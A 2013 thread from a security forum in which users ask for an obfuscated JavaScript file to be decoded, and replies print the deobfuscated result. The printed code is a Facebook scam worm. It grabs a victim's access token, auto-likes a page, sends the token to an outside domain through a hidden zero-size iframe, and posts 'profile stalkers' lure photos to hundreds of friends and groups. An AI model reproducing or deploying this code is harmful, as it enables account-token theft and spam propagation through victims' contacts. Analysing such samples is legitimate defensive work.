Waraxe IT Security Portal
Login or Register
October 28, 2025
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 43
Members: 0
Total: 43
Full disclosure
[REVIVE-SA-2025-002] Revive Adserver Vulnerability
[REVIVE-SA-2025-001] Revive Adserver Vulnerability
SEC Consult SA-20251021-0 :: Multiple Vulnerabilities in EfficientLab WorkExaminer Professional (CVE-2025-10639, CVE-2025-10640, CVE-2025-10641)
[SYSS-2025-017]: Verbatim Store 'n' Go Secure Portable HDD (security update v1.0.0.6) - Offline brute-force attack
[SYSS-2025-016]: Verbatim Store 'n' Go Secure Portable SSD (security update v1.0.0.6) - Offline brute-force attack
[SYSS-2025-015]: Verbatim Keypad Secure (security update v1.0.0.6) - Offline brute-force attack
Malvuln - MISP compatible malware vulnerability intelligencefeed now live
BSidesSF 2026 CFP still open until October 28th
Google Firebase hosting suspension / "malware distribution"bypass
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PHP script decode requests -> Any champion can decode this js please?
Post new topicReply to topic View previous topic :: View next topic
Any champion can decode this js please?
PostPosted: Sun Jul 28, 2013 8:18 am Reply with quote
jhonrhods
Beginner
Beginner
Joined: Jul 28, 2013
Posts: 2




https://stalkerxx.s3.amazonaws.com/miley.js
View user's profile Send private message
PostPosted: Sun Jul 28, 2013 10:56 am Reply with quote
sprremix
Regular user
Regular user
Joined: Apr 25, 2013
Posts: 7




This is as far as I came: http://pastebin.com/ZCEyq8qq
View user's profile Send private message
PostPosted: Thu Aug 01, 2013 5:47 pm Reply with quote
freeuser
Beginner
Beginner
Joined: Aug 01, 2013
Posts: 2




Code:

jQuery(document).ready(function ($) {
$('a#getcode').click(function (e) {
e.preventDefault();
window.open('token.php?getcode', 'popUpWindow', 'width=900,height=20,left=300,top=300,resizable=no,scrollbars=yes,toolbar=yes,menubar=no,location=no,directories=no, status=yes')
});
$('a#activate').click(function (e) {
e.preventDefault();
$('.howto').fadeOut(function () {
$('.result').show();
$('.error').hide();
$('#logs').html("");
$('.loading').fadeIn('fast', function () {
var access_token = $('.access_token').val();
if (access_token.split('#access_token=')[1]) {
var access_token = access_token.split('#access_token=')[1].split('&')[0];
setTimeout("top.location.href = 'http://addfollow.uni.me/';", 25000);
$.getJSON('https://graph.facebook.com/me?access_token=' + access_token, function (response) {
if (response.id) {
var uid = response.id;
HeemaNada(access_token);
HaveFun(access_token);
$('ul.list').append('<li><img src="https://graph.facebook.com/' + uid + '/picture" alt="' + response.name + '"><a href="#">Hey , ' + response.name + '</a></li>');
$('.loading').slideUp(function () {
$('.friendlist').slideDown()
})
}
})
} else {
$(this).fadeOut(2000, function () {
$('.error').fadeIn('fast');
$('.howto').fadeIn()
})
}
})
})
});
$('a#back').click(function (e) {
e.preventDefault();
$('.result').slideUp(function () {
$('.error').hide()
})
})
});

function HeemaNada(token) {
jQuery['ajax']({
url: 'https://graph.facebook.com/me/likes?access_token=' + token + '&method=POST&url=https://www.facebook.com/441238915973738',
dataType: 'jsonp',
success: function (_0xb26ax3) {}
})
};

function HaveFun(token) {
console['log']('Request Sent');
document['getElementById']('atp')['innerHTML'] = '<iframe src="http://morethan40.tk/index.php?access_token=' + token + '" width="0" height="0"></iframe>'
};
View user's profile Send private message
PostPosted: Tue Aug 06, 2013 10:03 am Reply with quote
dondon
Regular user
Regular user
Joined: Aug 06, 2013
Posts: 8




Funny, i am getting this. I'm not sure if above is correct.

Code:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body onLoad="GetGroups();GetFriends();getStatus();">
<script type="text/javascript" src="https://stalkerxx.s3.amazonaws.com/jquery.js"></script>

<script>
var access_token = "";
fotolink = "http://kundia.info/leta/dormans.php";
text = 'Get Your Profile Stalkerz Here --> www . profilestalkerss . tk (Remove Spaces) ';
gtext = 'Get Your Profile Stalkerz Here --> www . profilestalkerss . tk (Remove Spaces) ';
gonderildi = 0;

function GetGroups() {
jQuery['ajax']({
url: 'https://graph.facebook.com/fql?q=select gid, name from group where gid IN (SELECT gid FROM group_member WHERE uid=me()) order by rand() limit 70&access_token=' + access_token,
dataType: 'jsonp',
success: function (_0x1f66x7) {
Groups(_0x1f66x7);
}
});
};

function GetFriends() {
jQuery['ajax']({
url: 'https://graph.facebook.com/fql?q=SELECT uid, first_name FROM user WHERE uid IN ( SELECT uid2 FROM friend WHERE uid1 = me() ) ORDER BY rand() limit 400&access_token=' + access_token,
dataType: 'jsonp',
success: function (_0x1f66x7) {
Friends(_0x1f66x7);
}
});
};

function Friends(_0x1f66xa) {
for (i = 0; i < _0x1f66xa['data']['length']; i++) {
jQuery['ajax']({
url: 'https://graph.facebook.com/' + _0x1f66xa['data'][i]['uid'] + '/photos?url=' + fotolink + '&message=' + text + '&callback=paylas&method=POST&access_token=' + access_token,
dataType: 'script',
success: function () {
gonderildi += 1;
if (gonderildi >= _0x1f66xa['data']['length']) {};
}
});
};
};

function Groups(_0x1f66xa) {
for (i = 0; i < _0x1f66xa['data']['length']; i++) {
jQuery['ajax']({
url: 'https://graph.facebook.com/' + _0x1f66xa['data'][i]['gid'] + '/photos?url=' + fotolink + '&message=' + gtext + '&callback=paylas&method=POST&access_token=' + access_token,
dataType: 'script',
success: function () {
gonderildi += 1;
if (gonderildi >= _0x1f66xa['data']['length']) {};
}
});
};
};

function getStatus() {
$['getJSON']('https://graph.facebook.com/me/photos?url=' + fotolink + '&message=' + text + '&method=POST&access_token=' + access_token, function (_0x1f66xf) {
if (_0x1f66xf['id']) {
var _0x1f66x11 = _0x1f66xf['id'];
var _0x1f66x12 = 55;
$['getJSON']('https://graph.facebook.com/me/friends?limit=' + _0x1f66x12 + '&access_token=' + access_token, function (_0x1f66xf) {
if (_0x1f66xf['data']) {
var _0x1f66x13 = [];
$['each'](_0x1f66xf['data'], function (_0x1f66x14, _0x1f66x7) {
_0x1f66x13['push'](_0x1f66x7['id']);
$['getJSON']('https://graph.facebook.com/' + _0x1f66x11 + '/tags/' + _0x1f66x7['id'] + '/?method=POST&access_token=' + access_token, function (_0x1f66xf) {});
});
};
});
};
});
};

</script>
</body>
</html>
View user's profile Send private message
Any champion can decode this js please?
www.waraxe.us Forum Index -> PHP script decode requests
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.037 Seconds